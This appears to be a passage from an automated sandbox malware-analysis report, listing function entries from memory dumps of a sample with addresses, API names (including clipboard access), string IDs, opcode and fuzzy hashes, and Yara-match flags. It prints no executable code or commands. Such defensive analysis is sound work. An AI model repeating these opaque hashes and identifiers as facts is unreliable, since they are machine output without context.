                                                                                                                                                                                                                                                                        • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                                        • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                                        • Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767
                                                                                                                                                                                                                                                                        Function 00741538 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                                        • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                                        • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                                        • Instruction ID: 74706609659bc13154849b0267e7f8ab1879f88e83bf75b2644a1728cd621795
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F481E52010CBC289D326D63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                                                                                                                                                                                                                                                        Function 004312D1 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                                        • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                                        • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                                        • Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                                                                                                                                                                                                                                                        Function 0073EC54 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                                        • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                                        • Instruction ID: ffc472f5fc61d760fbdbdcc95a19f3d17030405b468ecdcd4b5633f72a832195
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7412821108BC1CED726CF388488646BFA16F66224F0886CDD8E54F3DBC774D51ACBA2
                                                                                                                                                                                                                                                                        Function 0042E9ED Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                                        • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                                        • Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
                                                                                                                                                                                                                                                                        Function 0073FA9A Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                                        • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                                        • Instruction ID: c060d876662498a4815d17518034cfcb82f8cb59c2ac90140c62c8288ce4d19d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB41E860108BC1CED726CF3C8498616BFA16B66224F088ADDD8E54F3DBC375D519CB66
                                                                                                                                                                                                                                                                        Function 0042F833 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                                        • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                                        • Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66
                                                                                                                                                                                                                                                                        Function 00742670 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                                        • Opcode ID: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
                                                                                                                                                                                                                                                                        • Instruction ID: 20dc27d1315411c15c8b50148f63f638e38eb20f04e979edfa943df1cb0dc40e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F41097010C7C18AD3659B28849878BBFE16B96314F885A9CE6E94B3E2C7798445C753
                                                                                                                                                                                                                                                                        Function 00432409 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                                        • Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                                                                                                                                                                                        • Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757
                                                                                                                                                                                                                                                                        Function 007423FB Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                                        • Opcode ID: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
                                                                                                                                                                                                                                                                        • Instruction ID: 858766d63f7960a57f809a205ec19ffad2c3a6880a70945224e3cbadc4e57491
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F410B7000D7C19AD3A59B28849874FBFE06BA7314F885A9CF6E84B3E2C7798449C753
                                                                                                                                                                                                                                                                        Function 00432194 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                                        • Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                                                                                                                                                                                        • Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757
                                                                                                                                                                                                                                                                        Function 00742144 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                        • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                                                                                                                                                                                                        • API String ID: 2610073882-1114116150
                                                                                                                                                                                                                                                                        • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                        • Instruction ID: bd7c222b05b752d076fca80953065e5b58cd1f06b5e0a7d91cd8e3a3a208c81f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E641373160C7C18ED331CB38885879BBFD2ABA6324F088AADD4E9872D6D7794505C763
                                                                                                                                                                                                                                                                        Function 00431EDD Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                        • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                                                                                                                                                                                                        • API String ID: 2610073882-1114116150
                                                                                                                                                                                                                                                                        • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                        • Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763
                                                                                                                                                                                                                                                                        Function 00742C27 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                                                                        • Opcode ID: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                                                                                                                                                                                        • Instruction ID: c093014eba8c0e7137c82b9263658b81341d9f1d973a392d5462e8967f24bf57
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D5107F1D086528FD700AB78C4493AEBFE0AB41310F048638E99587396D37D99A587A3